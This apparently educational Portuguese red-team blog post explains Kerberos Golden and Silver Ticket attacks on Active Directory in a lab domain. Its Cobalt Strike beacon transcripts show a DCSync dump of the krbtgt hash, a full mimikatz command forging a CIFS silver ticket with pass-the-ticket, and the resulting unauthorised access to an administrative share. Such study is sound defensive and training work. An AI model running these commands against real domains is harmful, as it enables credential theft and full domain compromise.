<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Golden & Silver | TUXTRACK</title><meta name="generator" content="Jekyll v4.0.1" /><meta property="og:title" content="Golden &amp; Silver" /><meta name="author" content="tuxtrack" /><meta property="og:locale" content="en_US" /><meta name="description" content="Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão." /><meta property="og:description" content="Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão." /><link rel="canonical" href="http://localhost:4000/posts/g&s/" /><meta property="og:url" content="http://localhost:4000/posts/g&s/" /><meta property="og:site_name" content="TUXTRACK" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-03-02T09:00:00-03:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Golden &amp; Silver" /><meta name="twitter:site" content="@tuxtrack" /><meta name="twitter:creator" content="@tuxtrack" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"datePublished":"2020-03-02T09:00:00-03:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/g&s/"},"url":"http://localhost:4000/posts/g&s/","author":{"@type":"Person","name":"tuxtrack"},"description":"Como mostrado no post anterior, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão.","headline":"Golden &amp; Silver","dateModified":"2020-03-02T09:00:00-03:00","@type":"BlogPosting","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/main.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/main.css"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous" async></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="style" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/syntax.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/syntax.css"> <script src="/assets/js/dist/tooltip-loader.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">TUXTRACK</a></div><div id="site-subtitle" class="font-italic">Hacking stuff directly from sertão</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>BLOG</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT ME</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/tuxtrack" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://instagram.com/tuxtrack" target="_blank"> <i class="fab fa-instagram"></i> </a> <a href="https://twitter.com/tuxtrack" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="javascript:window.open('mailto:' + ['tuxtrack','hacknroll.com'].join('@'))"> <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" target="_blank"> <i class="fas fa-rss"></i> </a></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Golden & Silver</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Mon, Mar 2, 2020, 9:00 AM -0300"> Mar 2, 2020 <i class="unloaded">2020-03-02T09:00:00-03:00</i> </span></div></div><div class="post-content"><p>Como mostrado no <a href="https://tuxtrack.github.io/posts/kerberos101/">post anterior</a>, em meio ao processo de autenticação de um usuário/computador em um ambiente Microsoft Active Directory utilizando o protocolo Kerberos, uma troca de informações ocorre para validar a conta em questão.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/img/sample/ges/kerb.png" alt="" /></p><p>Ao ocorrer a solicitação de acesso a algum recurso existente no domínio utilizando o protocolo Kerberos, automaticamente será solicitado ao KDC um ticket do tipo TGT (Ticket-Granting Ticket). Caso a conta seja válida, o KDC retornará o ticket assinado/criptografado pela conta KRBTGT.</p><blockquote><p>KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120. The KRBTGT account is the entity for the KRBTGT security principal, and it is created automatically when a new domain is created. <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn745899(v=ws.11)">MS Docs</a></p></blockquote><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/img/sample/ges/krbtgt.png" alt="" /></p><h3 id="golden-tickets">Golden Tickets</h3><p>O problema de segurança ocorre quando o hash da conta KRBTGT é comprometido. Nesse momento, o atacante pode forjar TGT’s, assinando-os com o hash obtido e se utilizar de qualquer conta presente no domínio (forjada) empoderando-se dos privilégios concedidos as mesmas ou adicionando novos privilégios alterando a estrutura do ticket.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/img/sample/ges/gt.png" alt="" /></p><ul><li>Forging Golden Tickets</li></ul><p>O ataque em questão foi apresentado por Benjamin Delpy, mais conhecido como <a href="https://twitter.com/gentilkiwi">@gentilkiwi</a>. Ele é o criador das famosas ferramentas <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a> e <a href="https://github.com/gentilkiwi/kekeo">Kekeo</a>, amplamente utilizadas por todos no mundo offsec.</p><p>Para efeitos de demonstração, foi utilizado a ferramenta Mimikatz para a execução do ataque. Existem outras ferramentas que podem auxiliar na tarefa, como o projeto <a href="https://github.com/GhostPack/Rubeus">Rubeus</a>, presente na toolkit <a href="https://github.com/GhostPack/">GhostPack</a>, projeto da SpecterOps criado para portar a maioria das ferramentas que antes eram escritas em Powershell para C#. Após as <a href="https://devblogs.microsoft.com/powershell/powershell-the-blue-team/">melhorias de seguranças aplicadas a partir da versão 5 do Powershell</a>, muitos ataques começaram a ser bloqueados, causando desconforto para os analistas. Mas isso é história para outro blog post.</p><p>Para que o Mimikatz possa executar o ataque, são necessários alguns bits de informação:</p><p>User: Usuário no qual o atacante deseja obter iguais privilégios.</p><p>Domain Name: FQDN <a href="https://en.wikipedia.org/wiki/Fully_qualified_domain_name">(Fully Qualified Domain Name)</a></p><p>Domain SID: Domain SID</p><p>KRBTGT NTLM Hash: Hash extraído do usuário KRBTGT.</p><p>Como mencionado, o atacante poderá alterar a estrutura do ticket, adicionando outras informações utilizando os parâmetros “/groups:” e “id”, para fornecer informções sobre grupos (Grupos com poderes administrativos: 512,513,518,519,520 ) e RID’s.</p><p>O processo de extração do hash da conta KRBTGT pode ser realizado de diversas formas, para mais informações, recomendo a leitura do blog post <a href="https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/">Dumping Domain Password Hashes</a>.</p><p>Processo de obtenção do hash através de <a href="https://adsecurity.org/?p=1729">DCSYNC Attack</a>.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>dcsync hnr.local krbtgt
<span class="go">[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:hnr.local /user:krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'hnr.local' will be the domain
[DC] 'GOKU.hnr.local' will be the DC server
[DC] 'krbtgt' will be the user account
Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : KRBTGT  
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 11/02/2020 00:41:33
Object Security ID   : S-1-5-21-45967290-1955130809-1078885739-502
Object Relative ID   : 502
Credentials:
  Hash NTLM: 86db69b9000654a8a4d4b6abe6ed1553
</span></pre></table></code></div></div><p>Com as informações necessárias em mãos, a execução do ataque pode ser concluída.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/img/sample/ges/mimi.png" alt="" /></p><p>Com a execução do mimikatz, o ticket para o usuário ganderson foi forjado e submetido na sessão atual utilizando um ataque chamado Pass-The-Ticket, parametro “/ptt” (Devo criar um outro blog post mostrando como funciona o Pass-the-ticket e Over Pass the Hash).</p><hr /><h3 id="silver-tickets">Silver Tickets</h3><p>Silver Tickets seguem a mesma ideia do Golden Ticket, porém, forjando um TGS (Service Ticket) em vez do TGT. Os tickets são criados utilizando a conta do computador ou conta de serviço do recurso que o atacante deseja acessar. As informações sobre o usuário, grupo e etc podem ser forjadas sem a necessidade de nenhuma troca de informação entre User Workstation e KDC.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/tuxtrack/tuxtrack.github.io/master/assets/img/sample/ges/st.png" alt="" /></p><p>Por padrão, as senhas das contas dos computadores são alteradas a cada 30 dias. Logo, o hash da conta pode ser alterado em meio ao projeto, causando perda de acesso. Para contornar o “problema”, é possível solicitar a informação sobre a máquina alvo e verificar o tempo limite até a senha ser alterada novamente.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>powerpick Get-NetComputer <span class="nt">-Name</span> SQL | Select name, samaccounttype, pwdlastset
<span class="go">[*] Tasked beacon to run: Get-NetComputer -Name SQL | Select name, samaccounttype, pwdlastset (unmanaged)
[+] host called home, sent: 133715 bytes
[+] received output:

name  samaccounttype pwdlastset         
----  -------------- ----------         
SQL  MACHINE_ACCOUNT 12/02/2020 14:53:05
</span></pre></table></code></div></div><p>Caso um usuário tente acessar um recurso no qual o mesmo não possui autorização, a negação do acesso é automaticamente efetuada. Para fins de demonstração, foi solicitado o acesso ao serviço de compartilhamento por um usuário que propositalmente não possui privilégios para tal.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>shell <span class="nb">dir</span> <span class="se">\\</span>SQL.hnr.local<span class="se">\c</span><span class="err">$</span>
<span class="gp">[*] Tasked beacon to run: dir \\SQL.hnr.local\c$</span><span class="w">
</span><span class="go">[+] host called home, sent: 53 bytes
[+] received output:
Access is denied.
</span></pre></table></code></div></div><p>Para forjar um Silver Ticket, algumas informações adicionais são necessárias:</p><p>Taget: FQDN <a href="https://en.wikipedia.org/wiki/Fully_qualified_domain_name">(Fully Qualified Domain Name)</a></p><p>Service: Serviço no qual deseja obter acesso (PS-Remoting, WMI, Scheduled Tasks, CIFS, LDAP, WINRM…)</p><p>rc4: NTLM Hash do computador/serviço, usado para assinar os tickets de serviço.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>mimikatz kerberos::golden /domain:hnr.local /user:admin /sid:S-1-5-21-45967290-1955130809-1078885739 /target:SQL.hnr.local /service:CIFS /rc4:95e93eb10b58109a6b0227d8c821dbdd /ptt
<span class="go">[*] Tasked beacon to run mimikatz's kerberos::golden /domain:hnr.local /user:admin /sid:S-1-5-21-45967290-1955130809-1078885739 /target:SQL.hnr.local /service:CIFS /rc4:95e93eb10b58109a6b0227d8c821dbdd /ptt command
[+] host called home, sent: 998474 bytes
[+] received output:
User      : admin
Domain    : hnr.local (HNR)
SID       : S-1-5-21-45967290-1955130809-1078885739
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 95e93eb10b58109a6b0227d8c821dbdd - rc4_hmac_nt      
Service   : CIFS
Target    : SQL.hnr.local
</span><span class="gp">Lifetime  : 01/03/2020 18:39:26 ;</span><span class="w"> </span>27/02/2030 18:39:26 <span class="p">;</span> 27/02/2030 18:39:26
<span class="gp">-&gt;</span><span class="w"> </span>Ticket : <span class="k">**</span> Pass The Ticket <span class="k">**</span>
<span class="go">
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'admin @ hnr.local' successfully submitted for current session
</span></pre></table></code></div></div><p>Utilizando a ferramenta klist, podemos confirmar que os tickets injetados permanecem armazenados em cache.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>shell klist
<span class="go">[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x51f1d

</span><span class="gp">#</span>0&gt;	Client: jbolsonaro @ HNR.LOCAL
<span class="go">	Server: krbtgt/HNR.LOCAL @ HNR.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
</span><span class="gp">	Ticket Flags 0x60a10000 -&gt;</span><span class="w"> </span>forwardable forwarded renewable pre_authent name_canonicalize 
<span class="go">	Start Time: 3/2/2020 13:56:50 (local)
	End Time:   3/2/2020 23:41:06 (local)
	Renew Time: 3/8/2020 18:11:06 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
</span><span class="gp">	Cache Flags: 0x2 -&gt;</span><span class="w"> </span>DELEGATION 
<span class="go">	Kdc Called: GOKU.hnr.local

</span><span class="gp">#</span>1&gt;	Client: jbolsonaro @ HNR.LOCAL
<span class="go">	Server: host/sql.hnr.local @ HNR.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
</span><span class="gp">	Ticket Flags 0x40a10000 -&gt;</span><span class="w"> </span>forwardable renewable pre_authent name_canonicalize 
<span class="go">	Start Time: 3/1/2020 18:11:06 (local)
	End Time:   3/2/2020 4:11:06 (local)
	Renew Time: 3/8/2020 18:11:06 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0 
	Kdc Called: GOKU.hnr.local
</span></pre></table></code></div></div><p>Como pode-se notar, após submeter o Silver Ticket na sessão para o serviço <a href="https://pt.wikipedia.org/wiki/Server_Message_Block">CIFS</a>, o acesso ao compartilhamento foi concedido, demonstrando a perfeita execução do ataque.</p><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="gp">beacon&gt;</span><span class="w"> </span>shell <span class="nb">dir</span> <span class="se">\\</span>SQL.hnr.local<span class="se">\c</span><span class="err">$</span>
<span class="gp">[*] Tasked beacon to run: dir \\SQL.hnr.local\c$</span><span class="w">
</span><span class="go">[+] host called home, sent: 53 bytes
[+] received output:
</span><span class="gp"> Volume in drive \\SQL.hnr.local\c$</span><span class="w"> </span>has no label.
<span class="go"> Volume Serial Number is 04AB-790B

</span><span class="gp"> Directory of \\SQL.hnr.local\c$</span><span class="w">
</span><span class="go">
</span><span class="gp">01/03/2020  11:09    &lt;DIR&gt;</span><span class="w">          </span>HNRDOCS
<span class="gp">15/09/2018  04:19    &lt;DIR&gt;</span><span class="w">          </span>PerfLogs
<span class="gp">12/02/2020  17:07    &lt;DIR&gt;</span><span class="w">          </span>Program Files
<span class="gp">12/02/2020  16:35    &lt;DIR&gt;</span><span class="w">          </span>Program Files <span class="o">(</span>x86<span class="o">)</span>
<span class="gp">12/02/2020  15:34    &lt;DIR&gt;</span><span class="w">          </span>SQLServer2017Media
<span class="gp">12/02/2020  15:53    &lt;DIR&gt;</span><span class="w">          </span>Users
<span class="gp">01/03/2020  18:11    &lt;DIR&gt;</span><span class="w">          </span>Windows
<span class="go">               0 File(s)              0 bytes
               7 Dir(s)  47.061.692.416 bytes free
</span></pre></table></code></div></div><p>O intuito dos posts é se fazer entender como funcionam os ataques. As ferramentas apresentadas são apenas meios para que possamos alcançar um objetivo. Espero que tenha conseguido passar com clareza todas as informações necessárias para o entendimento e sanar quaisquer dúvidas. Caso eu tenha pecado em algo, ou alguma informação não teve embasamento necessário para seu entendimento, por favor entre em contato comigo, ficarei extramente feliz em ajudar.</p><p>Até o próximo.!!!</p><h5 id="referências">Referências</h5><p>Abusing Microsoft Kerberos: Sorry You Guys Don’t Get It <a href="https://www.youtube.com/watch?v=lJQn06QLwEw">https://www.youtube.com/watch?v=lJQn06QLwEw</a></p></div><div class="post-tail-wrapper text-muted"><div class="pt-3"> <a href="/tags/kerberos/" class="post-tag no-text-decoration" >KERBEROS</a> <a href="/tags/active-directory/" class="post-tag no-text-decoration" >ACTIVE DIRECTORY</a> <a href="/tags/redteam/" class="post-tag no-text-decoration" >REDTEAM</a> <a href="/tags/windows/" class="post-tag no-text-decoration" >WINDOWS</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"> <!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label ml-1 mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Golden & Silver - TUXTRACK&url=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Golden & Silver - TUXTRACK&u=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Golden & Silver - TUXTRACK&url=http://localhost:4000/posts/g&s/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-4"><p class="font-italic text-muted small">Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//tuxtrack.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'http://localhost:4000/posts/g&s/'; this.page.identifier = '/posts/g&s/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const observer = lozad(); observer.observe(); </script></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted"></h4></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
